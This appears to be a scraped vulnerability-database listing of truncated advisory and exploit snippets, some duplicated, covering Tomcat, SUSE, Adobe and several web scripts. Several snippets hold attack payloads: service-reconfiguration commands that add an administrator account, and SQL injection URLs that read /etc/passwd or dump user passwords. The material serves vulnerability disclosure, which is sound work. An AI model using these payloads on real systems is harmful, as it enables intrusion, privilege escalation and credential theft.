tomcat: XSS in Apache Tomcat calendar application

Cross-site scripting XSS vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, relat...

Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation

To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /ad...

Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation

No description provided by source. To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add net...

SUSE: Security Summary (SUSE-SR:2009:017)

The remote host is missing updates announced in advisory SUSE-SR:2009:017. SuSE Security Summaries are short on detail when it comes to the names of packages affected by a particular bug. Because of this, while this test will detect out of date packages, it cannot tell you what bugs impact which...

SLES9: Security update for XFree86-server

The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: XFree86-Xnest XFree86-Xvfb XFree86-server More details may also be found by searching for keyword 5012942 within the SuSE Enterprise Server 9 patch database...

SLES9: Security update for Apache2

The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: apache2-worker apache2-prefork apache2-example-pages apache2 apache2-devel apache2-doc libapr0 For more information, please visit the referenced security...

cour supreme 'index.php' SQL Injection & Local File Include Vulnerability

================================================= Discovered By: CrAzY CrAcKeR Email: CrAzYCrAcKeRathotmaildotcom ================================================ example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,loadfile'/etc/passwd',8+from+mysql.user...

Cour Supreme - SQL Injection

Cour Supreme - SQL Injection ================================================= Discovered By: CrAzY CrAcKeR Email: CrAzYCrAcKeRathotmaildotcom ================================================ example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select...

Rubrique SQL Injection

================================================= Discovered By: CrAzY CrAcKeR Email: CrAzYCrAcKeRathotmaildotcom ================================================ example:- http://www.example.info/rubrique.php?id=-1+union+select+1,2,uslogin,uspassword,5,6,7,8,9,10,11,12,13,14+from+ausersf...

Perl$hop E-Commerce Input Injection

A while back I was playing around with Perl$hop, which if you are not aware, is an e-commerce script developed by Waverider Systems. XSS Cross Site Scripting, Directory Traversal, Code Execution, and more! Wow, that sure is a lot of vulnerabilities for one product. It would seem as if the...

Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection

Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection A while back I was playing around with Perl$hop, which if you are not aware, is an e-commerce script developed by Waverider Systems. XSS Cross Site Scripting, Directory Traversal, Code Execution, and more! Wow, that sure is a l...

Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection

A while back I was playing around with Perl$hop, which if you are not aware, is an e-commerce script developed by Waverider Systems. XSS Cross Site Scripting, Directory Traversal, Code Execution, and more! Wow, that sure is a lot of vulnerabilities for one product. It would seem as if the...

tomcat: XSS in Apache Tomcat calendar application

Cross-site scripting XSS vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, relat...

openSUSE Security Update : apache2 (apache2-330)

This updated fixes a problem in modproxyhttp that was introduced by previous security update. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from openSUSE Security Update apache2-330. The text description of this plugin i...

Ger Versluis 2000 SQL Injection

-------------------------------------------------------------------------- Ger Versluis 2000 version 5.5 24 SITEfiche.php SQL Injection Vulnerability -------------------------------------------------------------------------- + Author : DeCo017 + Email : 5s5atlivedotfr + Vulnerability : SQL...

Ger Versluis 2000 5.5 24 - SITE_fiche.php SQL Injection

Ger Versluis 2000 5.5 24 - SITEfiche.php SQL Injection -------------------------------------------------------------------------- Ger Versluis 2000 version 5.5 24 SITEfiche.php SQL Injection Vulnerability -------------------------------------------------------------------------- + Author : DeCo01...

Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection

source: https://www.securityfocus.com/bid/43710/info Tausch Ticket Script is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit...

BBSGood. Speed Version 4.0 injection vulnerability-vulnerability warning-the black bar safety net

| Version: BBSGood. Speed Version 4.0 Vulnerability file: The UserInfo. asp Vulnerability description: Variable Blogurl unfiltered into an sql statement, leading toSql injectionvulnerability --- Code example: Line 1 7 2 9-1 8 5 3. | case 1 4 if Request. QueryString"save"=1 then if trimRequest...

linux/x86 execve shellcode generator null byte free

Exploit for generator platform in category shellcode =================================================== linux/x86 execve shellcode generator null byte free =================================================== / \ Shellcode Generator null byte free. Author: certaindeath This program generates a...

Joomla Component com_pinboard Remote File Upload Vulnerability

Exploit for unknown platform in category web applications ============================================================== Joomla Component compinboard Remote File Upload Vulnerability ============================================================== | | Joomla Component compinboard Remote File Upload...